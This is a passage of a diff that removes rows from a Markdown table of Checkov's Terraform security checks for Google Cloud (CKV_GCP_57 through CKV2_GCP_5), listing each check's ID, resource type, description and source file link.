-| 2225 | CKV_GCP_57               | resource                         | google_sql_database_instance                                                                     | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1'                                                                                                                              | Terraform               | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py)                                                 |
-| 2226 | CKV_GCP_58               | resource                         | google_sql_database_instance                                                                     | Ensure SQL database 'cross db ownership chaining' flag is set to 'off'                                                                                                                                   | Terraform               | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py)                               |
-| 2227 | CKV_GCP_59               | resource                         | google_sql_database_instance                                                                     | Ensure SQL database 'contained database authentication' flag is set to 'off'                                                                                                                             | Terraform               | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py)                             |
-| 2228 | CKV_GCP_60               | resource                         | google_sql_database_instance                                                                     | Ensure Cloud SQL database does not have public IP                                                                                                                                                        | Terraform               | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py)                                                           |
-| 2229 | CKV_GCP_61               | resource                         | google_container_cluster                                                                         | Enable VPC Flow Logs and Intranode Visibility                                                                                                                                                            | Terraform               | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py)                                                                               |
-| 2230 | CKV_GCP_62               | resource                         | google_storage_bucket                                                                            | Bucket should log access                                                                                                                                                                                 | Terraform               | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py)                                                                                 |
-| 2231 | CKV_GCP_63               | resource                         | google_storage_bucket                                                                            | Bucket should not log to itself                                                                                                                                                                          | Terraform               | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py)                                                                         |
-| 2232 | CKV_GCP_64               | resource                         | google_container_cluster                                                                         | Ensure clusters are created with Private Nodes                                                                                                                                                           | Terraform               | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py)                                                                                         |
-| 2233 | CKV_GCP_65               | resource                         | google_container_cluster                                                                         | Manage Kubernetes RBAC users with Google Groups for GKE                                                                                                                                                  | Terraform               | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py)                                                             |
-| 2234 | CKV_GCP_66               | resource                         | google_container_cluster                                                                         | Ensure use of Binary Authorization                                                                                                                                                                       | Terraform               | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py)                                                                           |
-| 2235 | CKV_GCP_68               | resource                         | google_container_cluster                                                                         | Ensure Secure Boot for Shielded GKE Nodes is Enabled                                                                                                                                                     | Terraform               | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py)                                                             |
-| 2236 | CKV_GCP_68               | resource                         | google_container_node_pool                                                                       | Ensure Secure Boot for Shielded GKE Nodes is Enabled                                                                                                                                                     | Terraform               | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py)                                                             |
-| 2237 | CKV_GCP_69               | resource                         | google_container_cluster                                                                         | Ensure the GKE Metadata Server is Enabled                                                                                                                                                                | Terraform               | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py)                                                                   |
-| 2238 | CKV_GCP_69               | resource                         | google_container_node_pool                                                                       | Ensure the GKE Metadata Server is Enabled                                                                                                                                                                | Terraform               | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py)                                                                   |
-| 2239 | CKV_GCP_70               | resource                         | google_container_cluster                                                                         | Ensure the GKE Release Channel is set                                                                                                                                                                    | Terraform               | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py)                                                                                     |
-| 2240 | CKV_GCP_71               | resource                         | google_container_cluster                                                                         | Ensure Shielded GKE Nodes are Enabled                                                                                                                                                                    | Terraform               | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py)                                                                           |
-| 2241 | CKV_GCP_72               | resource                         | google_container_cluster                                                                         | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled                                                                                                                                            | Terraform               | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py)                                                               |
-| 2242 | CKV_GCP_72               | resource                         | google_container_node_pool                                                                       | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled                                                                                                                                            | Terraform               | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py)                                                               |
-| 2243 | CKV_GCP_73               | resource                         | google_compute_security_policy                                                                   | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                  | Terraform               | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py)                                                               |
-| 2244 | CKV_GCP_74               | resource                         | google_compute_subnetwork                                                                        | Ensure that private_ip_google_access is enabled for Subnet                                                                                                                                               | Terraform               | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py)                                               |
-| 2245 | CKV_GCP_75               | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow unrestricted FTP access                                                                                                                            | Terraform               | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py)                                   |
-| 2246 | CKV_GCP_76               | resource                         | google_compute_subnetwork                                                                        | Ensure that Private google access is enabled for IPV6                                                                                                                                                    | Terraform               | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py)                                       |
-| 2247 | CKV_GCP_77               | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow on ftp port                                                                                                                                        | Terraform               | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py)                                   |
-| 2248 | CKV_GCP_78               | resource                         | google_storage_bucket                                                                            | Ensure Cloud storage has versioning enabled                                                                                                                                                              | Terraform               | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py)                                                             |
-| 2249 | CKV_GCP_79               | resource                         | google_sql_database_instance                                                                     | Ensure SQL database is using latest Major version                                                                                                                                                        | Terraform               | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py)                                                                               |
-| 2250 | CKV_GCP_80               | resource                         | google_bigquery_table                                                                            | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                      | Terraform               | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py)                                                             |
-| 2251 | CKV_GCP_81               | resource                         | google_bigquery_dataset                                                                          | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                    | Terraform               | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py)                                                         |
-| 2252 | CKV_GCP_82               | resource                         | google_kms_crypto_key                                                                            | Ensure KMS keys are protected from deletion                                                                                                                                                              | Terraform               | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py)                                                                         |
-| 2253 | CKV_GCP_83               | resource                         | google_pubsub_topic                                                                              | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                         | Terraform               | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py)                                                                 |
-| 2254 | CKV_GCP_84               | resource                         | google_artifact_registry_repository                                                              | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                        | Terraform               | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py)                                                       |
-| 2255 | CKV_GCP_85               | resource                         | google_bigtable_instance                                                                         | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                   | Terraform               | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py)                                                       |
-| 2256 | CKV_GCP_86               | resource                         | google_cloudbuild_worker_pool                                                                    | Ensure Cloud build workers are private                                                                                                                                                                   | Terraform               | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py)                                                                 |
-| 2257 | CKV_GCP_87               | resource                         | google_data_fusion_instance                                                                      | Ensure Data fusion instances are private                                                                                                                                                                 | Terraform               | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py)                                                                     |
-| 2258 | CKV_GCP_88               | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow unrestricted mysql access                                                                                                                          | Terraform               | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py)                               |
-| 2259 | CKV_GCP_89               | resource                         | google_notebooks_instance                                                                        | Ensure Vertex AI instances are private                                                                                                                                                                   | Terraform               | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py)                                                                         |
-| 2260 | CKV_GCP_90               | resource                         | google_dataflow_job                                                                              | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                        | Terraform               | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py)                                                                 |
-| 2261 | CKV_GCP_91               | resource                         | google_dataproc_cluster                                                                          | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                       | Terraform               | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py)                                                         |
-| 2262 | CKV_GCP_92               | resource                         | google_vertex_ai_dataset                                                                         | Ensure Vertex AI datasets uses a CMK (Customer Managed Key)                                                                                                                                              | Terraform               | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py)                                                         |
-| 2263 | CKV_GCP_93               | resource                         | google_spanner_database                                                                          | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                       | Terraform               | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py)                                                         |
-| 2264 | CKV_GCP_94               | resource                         | google_dataflow_job                                                                              | Ensure Dataflow jobs are private                                                                                                                                                                         | Terraform               | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py)                                                                                   |
-| 2265 | CKV_GCP_95               | resource                         | google_redis_instance                                                                            | Ensure Memorystore for Redis has AUTH enabled                                                                                                                                                            | Terraform               | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py)                                                           |
-| 2266 | CKV_GCP_96               | resource                         | google_vertex_ai_metadata_store                                                                  | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key)                                                                                                                                        | Terraform               | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py)                                             |
-| 2267 | CKV_GCP_97               | resource                         | google_redis_instance                                                                            | Ensure Memorystore for Redis uses intransit encryption                                                                                                                                                   | Terraform               | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py)                                           |
-| 2268 | CKV_GCP_98               | resource                         | google_dataproc_cluster_iam_binding                                                              | Ensure that Dataproc clusters are not anonymously or publicly accessible                                                                                                                                 | Terraform               | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py)                                                                           |
-| 2269 | CKV_GCP_98               | resource                         | google_dataproc_cluster_iam_member                                                               | Ensure that Dataproc clusters are not anonymously or publicly accessible                                                                                                                                 | Terraform               | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py)                                                                           |
-| 2270 | CKV_GCP_99               | resource                         | google_pubsub_topic_iam_binding                                                                  | Ensure that Pub/Sub Topics are not anonymously or publicly accessible                                                                                                                                    | Terraform               | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py)                                                                                   |
-| 2271 | CKV_GCP_99               | resource                         | google_pubsub_topic_iam_member                                                                   | Ensure that Pub/Sub Topics are not anonymously or publicly accessible                                                                                                                                    | Terraform               | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py)                                                                                   |
-| 2272 | CKV_GCP_100              | resource                         | google_bigquery_table_iam_binding                                                                | Ensure that BigQuery Tables are not anonymously or publicly accessible                                                                                                                                   | Terraform               | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py)                                                                               |
-| 2273 | CKV_GCP_100              | resource                         | google_bigquery_table_iam_member                                                                 | Ensure that BigQuery Tables are not anonymously or publicly accessible                                                                                                                                   | Terraform               | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py)                                                                               |
-| 2274 | CKV_GCP_101              | resource                         | google_artifact_registry_repository_iam_binding                                                  | Ensure that Artifact Registry repositories are not anonymously or publicly accessible                                                                                                                    | Terraform               | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py)                                                                 |
-| 2275 | CKV_GCP_101              | resource                         | google_artifact_registry_repository_iam_member                                                   | Ensure that Artifact Registry repositories are not anonymously or publicly accessible                                                                                                                    | Terraform               | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py)                                                                 |
-| 2276 | CKV_GCP_102              | resource                         | google_cloud_run_service_iam_binding                                                             | Ensure that GCP Cloud Run services are not anonymously or publicly accessible                                                                                                                            | Terraform               | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py)                                                                     |
-| 2277 | CKV_GCP_102              | resource                         | google_cloud_run_service_iam_member                                                              | Ensure that GCP Cloud Run services are not anonymously or publicly accessible                                                                                                                            | Terraform               | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py)                                                                     |
-| 2278 | CKV_GCP_103              | resource                         | google_dataproc_cluster                                                                          | Ensure Dataproc Clusters do not have public IPs                                                                                                                                                          | Terraform               | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py)                                                                         |
-| 2279 | CKV_GCP_104              | resource                         | google_data_fusion_instance                                                                      | Ensure Datafusion has stack driver logging enabled                                                                                                                                                       | Terraform               | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py)                                                                     |
-| 2280 | CKV_GCP_105              | resource                         | google_data_fusion_instance                                                                      | Ensure Datafusion has stack driver monitoring enabled                                                                                                                                                    | Terraform               | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py)                                                         |
-| 2281 | CKV_GCP_106              | resource                         | google_compute_firewall                                                                          | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access                                                                                                                   | Terraform               | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py)                                   |
-| 2282 | CKV_GCP_107              | resource                         | google_cloudfunctions2_function_iam_binding                                                      | Cloud functions should not be public                                                                                                                                                                     | Terraform               | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                         |
-| 2283 | CKV_GCP_107              | resource                         | google_cloudfunctions2_function_iam_member                                                       | Cloud functions should not be public                                                                                                                                                                     | Terraform               | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                         |
-| 2284 | CKV_GCP_107              | resource                         | google_cloudfunctions_function_iam_binding                                                       | Cloud functions should not be public                                                                                                                                                                     | Terraform               | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                         |
-| 2285 | CKV_GCP_107              | resource                         | google_cloudfunctions_function_iam_member                                                        | Cloud functions should not be public                                                                                                                                                                     | Terraform               | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                         |
-| 2286 | CKV_GCP_108              | resource                         | google_sql_database_instance                                                                     | Ensure hostnames are logged for GCP PostgreSQL databases                                                                                                                                                 | Terraform               | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py)                                                       |
-| 2287 | CKV_GCP_109              | resource                         | google_sql_database_instance                                                                     | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower                                                                                                                                  | Terraform               | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py)                                     |
-| 2288 | CKV_GCP_110              | resource                         | google_sql_database_instance                                                                     | Ensure pgAudit is enabled for your GCP PostgreSQL database                                                                                                                                               | Terraform               | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py)                                                   |
-| 2289 | CKV_GCP_111              | resource                         | google_sql_database_instance                                                                     | Ensure GCP PostgreSQL logs SQL statements                                                                                                                                                                | Terraform               | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py)                                                     |
-| 2290 | CKV_GCP_112              | resource                         | google_kms_crypto_key_iam_binding                                                                | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform               | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                               |
-| 2291 | CKV_GCP_112              | resource                         | google_kms_crypto_key_iam_member                                                                 | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform               | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                               |
-| 2292 | CKV_GCP_112              | resource                         | google_kms_crypto_key_iam_policy                                                                 | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform               | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                               |
-| 2293 | CKV_GCP_113              | data                             | google_iam_policy                                                                                | Ensure IAM policy should not define public access                                                                                                                                                        | Terraform               | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py)                                                                                 |
-| 2294 | CKV_GCP_114              | resource                         | google_storage_bucket                                                                            | Ensure public access prevention is enforced on Cloud Storage bucket                                                                                                                                      | Terraform               | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py)                                                 |
-| 2295 | CKV_GCP_115              | resource                         | google_organization_iam_binding                                                                  | Ensure basic roles are not used at organization level.                                                                                                                                                   | Terraform               | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py)                                                                                   |
-| 2296 | CKV_GCP_115              | resource                         | google_organization_iam_member                                                                   | Ensure basic roles are not used at organization level.                                                                                                                                                   | Terraform               | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py)                                                                                   |
-| 2297 | CKV_GCP_116              | resource                         | google_folder_iam_binding                                                                        | Ensure basic roles are not used at folder level.                                                                                                                                                         | Terraform               | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py)                                                                             |
-| 2298 | CKV_GCP_116              | resource                         | google_folder_iam_member                                                                         | Ensure basic roles are not used at folder level.                                                                                                                                                         | Terraform               | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py)                                                                             |
-| 2299 | CKV_GCP_117              | resource                         | google_project_iam_binding                                                                       | Ensure basic roles are not used at project level.                                                                                                                                                        | Terraform               | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py)                                                                           |
-| 2300 | CKV_GCP_117              | resource                         | google_project_iam_member                                                                        | Ensure basic roles are not used at project level.                                                                                                                                                        | Terraform               | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py)                                                                           |
-| 2301 | CKV_GCP_118              | resource                         | google_iam_workload_identity_pool_provider                                                       | Ensure IAM workload identity pool provider is restricted                                                                                                                                                 | Terraform               | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py)                                               |
-| 2302 | CKV_GCP_119              | resource                         | google_spanner_database                                                                          | Ensure Spanner Database has deletion protection enabled                                                                                                                                                  | Terraform               | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py)                                                     |
-| 2303 | CKV_GCP_120              | resource                         | google_spanner_database                                                                          | Ensure Spanner Database has drop protection enabled                                                                                                                                                      | Terraform               | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py)                                                             |
-| 2304 | CKV_GCP_121              | resource                         | google_bigquery_table                                                                            | Ensure BigQuery tables have deletion protection enabled                                                                                                                                                  | Terraform               | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py)                                                         |
-| 2305 | CKV_GCP_122              | resource                         | google_bigtable_instance                                                                         | Ensure Big Table Instances have deletion protection enabled                                                                                                                                              | Terraform               | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py)                                                   |
-| 2306 | CKV_GCP_123              | resource                         | google_container_cluster                                                                         | GKE Don't Use NodePools in the Cluster configuration                                                                                                                                                     | Terraform               | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py)                                                                                 |
-| 2307 | CKV2_GCP_1               | resource                         | google_project_default_service_accounts                                                          | Ensure GKE clusters are not running using the Compute Engine default service account                                                                                                                     | Terraform               | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml)                         |
-| 2308 | CKV2_GCP_2               | resource                         | google_compute_network                                                                           | Ensure legacy networks do not exist for a project                                                                                                                                                        | Terraform               | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml)                                                     |
-| 2309 | CKV2_GCP_3               | resource                         | google_service_account_key                                                                       | Ensure that there are only GCP-managed service account keys for each service account                                                                                                                     | Terraform               | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml)                                                   |
-| 2310 | CKV2_GCP_4               | resource                         | google_logging_folder_sink                                                                       | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform               | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                               |
-| 2311 | CKV2_GCP_4               | resource                         | google_logging_organization_sink                                                                 | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform               | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                               |
-| 2312 | CKV2_GCP_4               | resource                         | google_logging_project_sink                                                                      | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform               | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                               |
-| 2313 | CKV2_GCP_4               | resource                         | google_storage_bucket                                                                            | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform               | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                               |
-| 2314 | CKV2_GCP_5               | resource                         | google_project                                                                                   | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project                                                                                                  | Terraform               | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml)                       |
